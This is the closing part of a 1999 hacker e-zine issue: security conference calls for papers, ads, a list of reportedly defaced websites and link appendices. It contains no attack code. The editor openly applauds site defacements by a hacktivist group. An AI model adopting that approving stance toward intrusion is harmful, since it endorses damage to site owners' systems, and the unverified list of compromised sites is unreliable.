  4463.        pragmatic tools and knowledge they need to help thwart those lurking in
  4464.        the shadows of your fire wall or the depths of your company's WAN. The
  4465.        reality is they are out there [back to the FUD]. The choice is yours--you
  4466.        can live in fear of them, or you can learn from people like them.
  4467.        
  4468.        
  4469.        Conference Overview
  4470.        
  4471.        
  4472.        Spanning two days with three separate tracks, The Black Hat Briefings will
  4473.        focus on the vital security issues facing organizations with large
  4474.        Enterprise networks and mixed network operating systems. Topics will
  4475.        Include Intrusion Detection Systems (IDS), Computer Forensics (CF)systems,
  4476.        Incident Response, Hostile Mobile Code, vulnerability analysis, secure
  4477.        programming techniques, tool selection for creating and effectively
  4478.        monitoring your networks, and management issues related to computer
  4479.        security.  You will be put face-to-face with the people developing the
  4480.        tools used by and against hackers.
  4481.        
  4482.        
  4483.        This year the Black Hat Briefings has grown to include a separate track
  4484.        specifically designed for the CEO and CIO. This third track, nick named
  4485.        the "White Hat" track, was developed by the National Computer Security
  4486.        Center (NCSC) of the National Security Agency. While the other tracks have
  4487.        a technology focus, this track is for people who have to manage an
  4488.        organization's security posture. What should you look for when hiring an
  4489.        outside security consultant? Should you even look outside your
  4490.        organization?  What are the potential security threats?  What should you
  4491.        do to reduce the risk of losses due to computer security incidents? The
  4492.        "White Hat" track will help you answer these questions. 
  4493.        
  4494.        
  4495.        The Black Hat Briefings has developed a reputation for lively and in-depth
  4496.        presentations and discussions between "underground" security celebrities,
  4497.        vendors, and attendees.  This year you can expect more visual
  4498.        demonstrations, more speakers who are authoritative in their fields, and,
  4499.        as always, an excellent time. 
  4500.        As an added bonus, people who attend The Black Hat Briefings get free
  4501.        admission to DEF CON 7.0, the largest Hacker convention in the US, held
  4502.        right after Black Hat in Las Vegas. For more information see the DEFCON
  4503.        web site at http://www.defcon.org/. 
  4504.        
  4505.        
  4506.        
  4507.        Speakers
  4508.        
  4509.        
  4510.        Current Speakers include the following.
  4511.        
  4512.        
  4513.        - Bruce Schneier, author of Blowfish, TwoFish and Applied Cryptography.
  4514.        - Marcus Ranum, CEO of Network Flight Recorder and designer of the first
  4515.          commercial fire wall.
  4516.        - Dominique Brezinski, Network Security Consultant.
  4517.        - Greg Hogland, Author of the Asmodeous NT scanner and the Web Trends
  4518.          security scanner.
  4519.        - Peter Stephenson, Principle consultant of the Intrusion Management
  4520.          and Forensics Group.
  4521.        - The Simple Nomad, of the Nomad Mobile Research Centre
  4522.        
  4523.        
  4524.        More speakers will be listed as the call for papers ends on March 15th.
  4525.        
  4526.        
  4527.        Location
  4528.        
  4529.        
  4530.        The Venetian Resort and Casino Las Vegas, NV
  4531.        (http://www.venetian.com/)
  4532.        
  4533.        
  4534.        Registration Costs 
  4535.        
  4536.        
  4537.        Registration costs are $995 US before June 14th 1998. 
  4538.        Late registration fees are $1,195 after June 14th. 
  4539.        You may cancel your registration before July 1st for a full refund. 
  4540.        This fee includes two days of speaking, materials, a reception, and meals. 
  4541.        To register, please visit http://www.blackhat.com/
  4542.        
  4543.        
  4544.        Sponsors
  4545.        
  4546.        
  4547.        Secure Computing Corporation (http://www.securecomputing.com/)
  4548.        The National Computer Security Center (NCSC)
  4549.        Network Flight Recorder (http://www.nfr.com/)
  4550.        Counterpane Systems (http://www.counterpane.com/)
  4551.        Aventail (http://www.aventail.com/)
  4552.        
  4553.        
  4554.        More Information
  4555.        
  4556.        
  4557.        email: blackhat@defcon.org with email questions
  4558.        or visit
  4559.        http://www.blackhat.com/ for the latest speakers and events listings.
  4560.        
  4561.        
  4562.        -o-
  4563.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  4564.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]      
  4565.                    
  4566.      
  4567.   12.0 CQRE (Secure) Congress and Exhibition
  4568.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4569.        Forwarded From: "Detlef [iso-8859-1] Hⁿhnlein" <huehnlein@secunet.de>
  4570.        
  4571.        
  4572.        ***************************************************************
  4573.                             Call for Papers
  4574.                    CQRE [Secure] Congress & Exhibition
  4575.               Duesseldorf, Germany, Nov. 30 - Dec. 2 1999
  4576.        ---------------------------------------------------------------
  4577.        provides a new international forum covering most aspects of
  4578.        information security with a special focus to the role of
  4579.        information security in the context of rapidly evolving economic
  4580.        processes.
  4581.        ---------------------------------------------------------------
  4582.        Deadline for submission of extended abstracts: May 14, 1999
  4583.        website: http://www.secunet.de/forum/cqre.html
  4584.        mailing-list: send mailto:cqre@secunet.de 
  4585.        (where the subject is "subscribe" without paranthesis)
  4586.        ***************************************************************
  4587.        
  4588.        
  4589.        The "CQRE - secure networking" provides a new international
  4590.        forum giving a close-up view on information security in the context
  4591.        of rapidly evolving economic processes. The unprecedented
  4592.        reliance on computer technology transformed the previous technical
  4593.        side- issue "information security'' to a management problem
  4594.        requiring decisions of strategic importance. Hence, the targeted
  4595.        audience represents decision makers from government, industry,
  4596.        commercial, and academic communities. If you are developing
  4597.        solutions to problems relating to the protection of your countryÆs
  4598.        information infrastructure or a commercial enterprise, consider
  4599.        submitting a paper to the "CQRE - secure networking" conference.
  4600.        
  4601.        
  4602.        We are looking for papers and panel discussions covering:
  4603.        .. electronic commerce
  4604.        - new business processes
  4605.        - secure business transactions
  4606.        - online merchandising
  4607.        - electronic payment / banking
  4608.        - innovative applications
  4609.        
  4610.        
  4611.        .. network security
  4612.        - virtual private networks
  4613.        - security aspects in internet utilization
  4614.        - security aspects in multimedia-
  4615.           applications
  4616.        - intrusion detection systems
  4617.        
  4618.        
  4619.        .. legal aspects
  4620.        - digital signatures acts
  4621.        - privacy and anonymity
  4622.        - crypto regulation
  4623.        - liability
  4624.        
  4625.        
  4626.        .. corporate security
  4627.        - access control
  4628.        - secure teleworking
  4629.        - enterprise key management
  4630.        - IT-audit
  4631.        - risk / disaster management
  4632.        - security awareness and training
  4633.        - implementation, accreditation, and
  4634.           operation of secure systems in a
  4635.           government, business, or industry
  4636.           environment
  4637.        
  4638.        
  4639.        .. security technology
  4640.        - cryptography
  4641.        - public key infrastructures
  4642.        - chip card technology
  4643.        - biometrics
  4644.        
  4645.        
  4646.        .. trust management
  4647.        - evaluation of products and systems
  4648.        - international harmonization of security
  4649.           evaluation criterias
  4650.        .. standardization
  4651.        .. future perspectives
  4652.        
  4653.        
  4654.        Any other contribution addressing the involvement of IT security in
  4655.        economic processes will be welcome. Authors are invited to submit
  4656.        an extended abstract of their contribution to the program chair.
  4657.        The submissions should be original research results, survey
  4658.        articles or ``high quality'' case studies and position papers.
  4659.        Product advertisements are welcome for presentation, but will not
  4660.        be considered for the proceedings. Manuscripts must be in English,
  4661.        and not more than 2.000 words. The extended abstracts should be in
  4662.        a form suitable for anonymous review, with no author names,
  4663.        affiliations, acknowledgements or obvious references. Contributions
  4664.        must not be submitted in parallel to any conference or workshop
  4665.        that has proceedings. Separately, an abstract of the paper with no
  4666.        more than 200 words and with title, name and addresses (incl. an
  4667.        E-mail address) of the authors shall be submitted. In the case of
  4668.        multiple authors the contacting author must be clearly identified.
  4669.        We strongly encourage electronic submission in Postscript format.
  4670.        The submissions must be in 11pt format, use standard fonts or
  4671.        include the necessary fonts. Proposals for panel discussions should
  4672.        also be sent to the program chair. Panels of interest include those
  4673.        that present alternative/controversial viewpoints or those that
  4674.        encourage lively discussions of relevant issues. Panels that are
  4675.        collections of unrefereed papers will not be considered. Panel
  4676.        proposals should be a minimum of one page describing the subject
  4677.        matter, the appropriateness of the panel for this conference and
  4678.        should identify participants and their respective viewpoints.
  4679.        
  4680.        
  4681.        mailing list/ web-site:
  4682.        -----------------------
  4683.        If you want to receive emails with subsequent Call for Papers and
  4684.        registration information, please send a brief mail to
  4685.        cqre@secunet.de. You will find this call for papers and further
  4686.        information at http://www.secunet.de/forum/cqre.html .
  4687.        
  4688.        
  4689.        important dates:
  4690.        ----------------
  4691.        deadline for submission of extended abstracts May 14, 1999
  4692.        deadline for submission of panel proposals    June 1, 1999
  4693.        notification of acceptance                   June 25, 1999
  4694.        deadline for submission of complete papers   July 30, 1999
  4695.        
  4696.        
  4697.        program chair:
  4698.        --------------
  4699.        secunet - Security Networks GmbH
  4700.        c/o Rainer Baumgart 
  4701.        Weidenauer Str. 223 - 225
  4702.        57076 Siegen
  4703.        Germany
  4704.        Tel.: +49-271-48950-15
  4705.        Fax:  +49-271-48950-50
  4706.        R.Baumgart@secunet.de
  4707.        
  4708.        
  4709.        
  4710.        program committee:
  4711.        ------------------
  4712.        Johannes Buchmann   (TU Darmstadt)
  4713.        Dirk Fox            (Secorvo)
  4714.        Walter Fumy         (Siemens)
  4715.        Rⁿdiger Grimm       (GMD)
  4716.        Helena Handschuh    (ENST/Gemplus)
  4717.        Thomas Hoeren       (Uni Muenster)
  4718.        Pil Joong Lee       (POSTECH)
  4719.        Alfred Menezes      (U.o.Waterloo/Certicom)
  4720.        David Naccache      (Gemplus)
  4721.        Clifford Neumann    (USC)
  4722.        Mike Reiter         (Bell Labs)
  4723.        Matt Robshaw        (RSA)
  4724.        Richard Schlechter  (EU-comm.)
  4725.        Bruce Schneier      (Counterpane)
  4726.        Tsuyoshi Takagi     (NTT)
  4727.        Yiannis Tsiounis    (GTE Labs)
  4728.        Michael Waidner     (IBM)
  4729.        Moti Yung           (CERTCO)
  4730.        Robert Zuccherato   (Entrust)
  4731.        
  4732.        
  4733.        -o-
  4734.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  4735.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
  4736.           
  4737.   13.0 Canc0n99 the grassroots con for North America
  4738.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4739.        
  4740.        This promises to be quite the event, even although nothing is
  4741.        carved in stone yet since it is early days the tentative dates
  4742.        are Aug 19th-22nd "somewhere in Niagara Falls" region right near
  4743.        the tourist trap. Several venues are under consideration and the
  4744.        dates are flexible and may change to suit speaker availablity.
  4745.        
  4746.        We're still looking for people that are willing to speak or people
  4747.        that want to submit papers to have introduced at the c0n, send in
  4748.        your proposals now to be sure that you have a space on the schedule
  4749.        with papers and talks aside there will be sightseeing and the 
  4750.        opportunity to party and generally socialize with the younger set
  4751.        it should prove quite interesting all around from professors to
  4752.        "punk ass hax0rs" ;-) some of the people may surprise you and that
  4753.        will be the key to success for this con.fun.it will be a fun event
  4754.        with tshirts and other giveaways to show you were there...don't miss
  4755.        out, register in advance  and this will probably be the most fun you
  4756.        can have for a measly $15 Cdn ($10 US) cd burning parties, for linux
  4757.         / bsd cd's etc (byocds) visit http://come.to/canc0n99 for up to date
  4758.         news as it becomes available. For those interested there are pre-con
  4759.         T-Shirts available for $20 Cdn with the hwa logo (pictures to come
  4760.        on the site) send in your order requests to the main email and you
  4761.        will be notified when they are ready to ship,  all proceeds go 
  4762.        towards making the con a better event and dj equipment etc....this is
  4763.        a NON PROFIT event!!!! we're hoping to break even at best so get as 
  4764.        many of your friends together as you can and order a cool T-shirt or
  4765.        preregister for the con and help us make it a huge success.
  4766.        
  4767.        Vendors welcome see site for details.
  4768.        SPEAKERS wanted! interested? email us your idea/proposal...
  4769.              
  4770.        
  4771.        
  4772.        @HWA
  4773.        
  4774.   14.0 Countering Cyberterrorism
  4775.        ~~~~~~~~~~~~~~~~~~~~~~~~~
  4776.        
  4777.        Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
  4778.        Courtesy of Cryptography List.
  4779.        Originally From: Clifford Neuman <bcn@ISI.EDU>
  4780.        
  4781.        
  4782.        
  4783.                     Countering Cyber-Terrorism
  4784.                       June 22-23
  4785.                     Marina del Rey, California
  4786.              A workshop sponsored by the Information Sciences Institute
  4787.                   of the University of Southern California
  4788.        
  4789.        
  4790.                 Call for Participation
  4791.        
  4792.        
  4793.        Recent studies warn of Cyber-Terrorism and the vulnerability of our
  4794.        computer systems and infrastructure to attack. These reports identify
  4795.        damage that determined, knowledgeable, and well-financed adversaries could
  4796.        inflict on commercial, government, and military systems.  Such attacks
  4797.        would have severe consequences for the public, and in particular the
  4798.        economy, which has become dependant on computers and communications
  4799.        infrastructure.
  4800.        
  4801.        
  4802.        The objective of this workshop is to identify things that should be done
  4803.        to improve our ability to detect, protect against, contain, neutralize,
  4804.        mitigate the effects of, and recover from cyber-terrorist attacks.
  4805.        Participants are sought from the computer security, electronic commerce
  4806.        and banking, network infrastructure, military, and counter-terrorism
  4807.        communities, as well as those with experience of cyber-terrorist attacks.
  4808.        Recommendations may suggest research and development or operational
  4809.        measures that can be taken.  The workshop is NOT a forum for presentation
  4810.        of the latest security systems, protocols or algorithms.  The workshop
  4811.        will address the strategies, framework, and infrastructure required to
  4812.        combine and incrementally deploy such technologies to counter the
  4813.        cyber-terrorist threat.
  4814.        
  4815.        
  4816.        Attendance will be limited to approximately 25 participants.  Participants
  4817.        will be selected on the basis of submitted position papers that raise
  4818.        issues for the workshop to discuss, identify threats or countermeasures,
  4819.        or propose strategies or infrastructure to counter the threat of
  4820.        cyber-terrorism. Position papers should be four pages or less in length. 
  4821.        Submissions should be sent in e-mail in Word or PDF format, or as ASCII
  4822.        text to cyber-terrorism-ws@isi.edu.
  4823.        
  4824.        
  4825.        Please check the web page http://www.isi.edu/cctws for more information,
  4826.        including a position paper from the organizers which will be available two
  4827.        weeks prior to the submission deadline.
  4828.        
  4829.        
  4830.        Important Dates:
  4831.        
  4832.        
  4833.          Organizer's Paper Available              April  5, 1999
  4834.          Position Papers Due                      April 19, 1999
  4835.          Notification of Acceptance               May 1, 1999
  4836.          Revised Position Papers Due              May 28, 1999
  4837.          Position Papers Available on Web         June 9
  4838.          Workshop Dates                           June 22-23
  4839.        
  4840.        
  4841.        Organizing Committee:
  4842.        
  4843.        
  4844.           Bob Balzer, Information Sciences Institute, Balzer@isi.edu
  4845.           Thomas Longstaff, CERT Coordination Center, tal@cert.org
  4846.           Don Faatz, the MITRE Corporation, dfaatz@mitre.org 
  4847.           Clifford Neuman, Information Sciences Institute, bcn@isi.edu
  4848.        
  4849.        
  4850.        
  4851.        -o-
  4852.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  4853.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] 
  4854.           
  4855.        @HWA
  4856.                       
  4857.                               -=-    :.    .:        -=-
  4858.                               
  4859.                               
  4860.                               
  4861.                               
  4862.                               
  4863.  
  4864.  AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
  4865.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4866.  
  4867.        $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
  4868.        !                                                                            !       
  4869.        $                                                                            $       
  4870.        !     *** IT HAS BEEN FOUR YEARS! ***    FREE KEVIN MITNICK NOW!!!! **       !
  4871.        $                                                                            $              
  4872.        !                                                                            !
  4873.        $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
  4874.  
  4875.        www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
  4876.        n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
  4877.        m www.2600.com ########################################ww.2600.com www.freeke
  4878.        vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
  4879.        com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
  4880.        kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
  4881.        k.com www.2600.########################################om www.2600.com www.fre
  4882.        ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
  4883.        k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
  4884.  
  4885.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  4886.        * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
  4887.        *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
  4888.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  4889.  
  4890.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  4891.        * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
  4892.        * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
  4893.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  4894.  
  4895.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  4896.        * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
  4897.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  4898.  
  4899.  
  4900.          //////////////////////////////////////////////////////////////////////////////
  4901.         //  To place an ad in this section simply type it up and email it to        //
  4902.        //        hwa@press,usmc.net, put AD! in the subject header please. - Ed    //
  4903.       //////////////////////////////////////////////////////////////////////////////
  4904.  
  4905.  
  4906.      @HWA
  4907.  
  4908.  
  4909.   H.W  Hacked websites Feb 28th-March 7th
  4910.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4911.  
  4912.      Note: The hacked site reports stay, especially with some cool hits by
  4913.            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
  4914.  
  4915.          * Hackers Against Racist Propaganda (See issue #7)
  4916.          
  4917.     
  4918.     In the last release we mentioned that www.hackernews.com's server was 
  4919.    showing only the directory structure and no site was available also that
  4920.    the www.l0pht.com server was not accepting http requests, neither site 
  4921.    was indeed hacked they were both merely down for maintenance, but it was
  4922.    'reported' here as a possible hack since I didn't have time to confirm or
  4923.    deny the report by contacting the admins before the issue went out, hope
  4924.    it didn't cause too much of an annoyance to anyone and my apologies to
  4925.    both hackernews and the l0pht for any alarmism perceived or imagined
  4926.    by the report 8-o - Ed
  4927.         
  4928.    March 11th Raza-Mexicana's crack National Commission of Human Rights
  4929.    web page and replaced it with a political message.
  4930.    archived by HNN at http://www.hackernews.com/archive/crackarch.html
  4931.    
  4932.    http://www.cndh.org.mx
  4933.    
  4934.    March 10th
  4935.    contributed by Anonymous 
  4936.  
  4937.    Cracked
  4938.    
  4939.    We have reports that the following sites have been compromnised, 
  4940.    some of them by the RAzaMExicana Hackers TEam.
  4941.    
  4942.       http://www.unca.edu.ar 
  4943.       http://biblioweb.dgsca.unam.mx/revistas 
  4944.       http://biblioweb.dgsca.unam.mx/AGN 
  4945.       http://www.digital-holding.no 
  4946.       http://www.efo.no 
  4947.       http://www.prestkvern.no 
  4948.       http://www.usoft.no 
  4949.       http://www.waaler.no 
  4950.       http://www.input.nohttp://www.input.no
  4951.  
  4952.    
  4953.     News of these sites was contributed to Help Net Security by Deepcase and
  4954.     HNN by anonymous
  4955.     Cracked March 6th/7th
  4956.  
  4957.       http://www.tcedge.com
  4958.       http://www.home-listings.com
  4959.       http://www.eecsys.com
  4960.       http://www.globestf.com
  4961.       http://www.rossi-consulting.com
  4962.       http://www.ircn.com 
  4963.       http://www.neslabinc.com
  4964.       http://www.des-con-systems.com
  4965.       http://resource-central.com/
  4966.       http://totalarmstrength.com/
  4967.       http://www.landbridge.gov.cn/
  4968.       http://www.softwaresuccess.com/
  4969.       http://www.pwr1.com
  4970.       http://www.montgomeryhospice.com/
  4971.       http://wrair-www.army.mil/
  4972.       http://ohrm.niddk.nih.gov/
  4973.       http://www.gunmetalblue.com 
  4974.       http://www.all-the-marbles.com 
  4975.       http://www.neslabinc.com 
  4976.       http://www.rossi-consulting.com 
  4977.       http://www.cleanstart.com 
  4978.       http://www.netzero.net 
  4979.       http://www.netsnitch.com 
  4980.       http://www.eranorton.com 
  4981.       http://www.ritop.com 
  4982.       http://www.tcedge.com 
  4983.       http://www.home-listings.com 
  4984.       http://www.eecsys.com 
  4985.       http://www.globestf.com 
  4986.       http://www.eyecare-experts.com 
  4987.       http://www.hitecdentist.com      
  4988.  
  4989.  
  4990.       @HWA
  4991.  
  4992.        _________________________________________________________________________
  4993.  
  4994.   A.0                              APPENDICES
  4995.        _________________________________________________________________________
  4996.  
  4997.  
  4998.  
  4999.   A.1  PHACVW, sekurity, security, cyberwar links
  5000.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5001.  
  5002.        The links are no longer maintained in this file, there is now a
  5003.       links section on the http://welcome.to/HWA.hax0r.news/ url so check
  5004.       there for current links etc.
  5005.  
  5006.       The hack FAQ (The #hack/alt.2600 faq)
  5007.       http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
  5008.  
  5009.       Hacker's Jargon File (The quote file)
  5010.       http://www.lysator.liu.se/hackdict/split2/main_index.html
  5011.  
  5012.  
  5013.  
  5014.       International links:(TBC)
  5015.       ~~~~~~~~~~~~~~~~~~~~~~~~~
  5016.  
  5017.       Foreign correspondants and others please send in news site links that
  5018.       have security news from foreign countries for inclusion in this list
  5019.       thanks... - Ed
  5020.  
  5021.       Netherlands...: http://security.pine.nl/
  5022.       Russia........: http://www.tsu.ru/~eugene/
  5023.       Indonesia.....: http://www.k-elektronik.org/index2.html
  5024.                       http://members.xoom.com/neblonica/
  5025.       Brasil........: http://www.psynet.net/ka0z
  5026.                       http://www.elementais.cjb.net
  5027.  
  5028.     Got a link for this section? email it to hwa@press.usmc.net and i'll
  5029.     review it and post it here if it merits it.
  5030.  
  5031.     @HWA
  5032.  
  5033.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  5034.     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  5035.  
  5036.     ⌐ 1998, 1999 (c) Cruciphux/HWA.hax0r.news
  5037.     (r) Cruciphux is a trade mark of Hunted & Wounded Associates
  5038.  
  5039.  
  5040.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  5041.  
  5042.      
  5043.  
  5044.      --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  5045.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  5046.    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  5047.        [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]